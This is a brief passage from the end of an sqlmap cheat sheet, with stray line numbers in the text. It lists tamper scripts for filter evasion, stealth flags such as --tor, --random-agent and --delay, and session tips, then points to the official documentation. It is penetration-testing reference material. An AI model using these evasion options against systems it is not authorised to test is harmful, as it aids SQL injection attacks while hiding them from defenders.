multiple tampers: `--tamper=between,randomcase,space2comment,charencode`. 666 * For maximum stealth: `--tor`, `--random-agent`, `--delay`, single thread. 667 * Session management: Use `--flush-session` when changing targets or flags significantly. 668 * RTFM: `sqlmap -hh` for advanced help. 669 670 **This cheat sheet is comprehensive but not exhaustive. Always refer to the official SQLMap documentation and use `-hh` for complete flag details.**